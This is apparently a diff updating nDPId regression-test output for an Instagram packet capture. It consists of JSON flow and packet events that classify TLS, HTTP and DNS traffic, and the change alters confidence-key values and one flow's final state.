00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -176,47 +175,47 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"} 
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
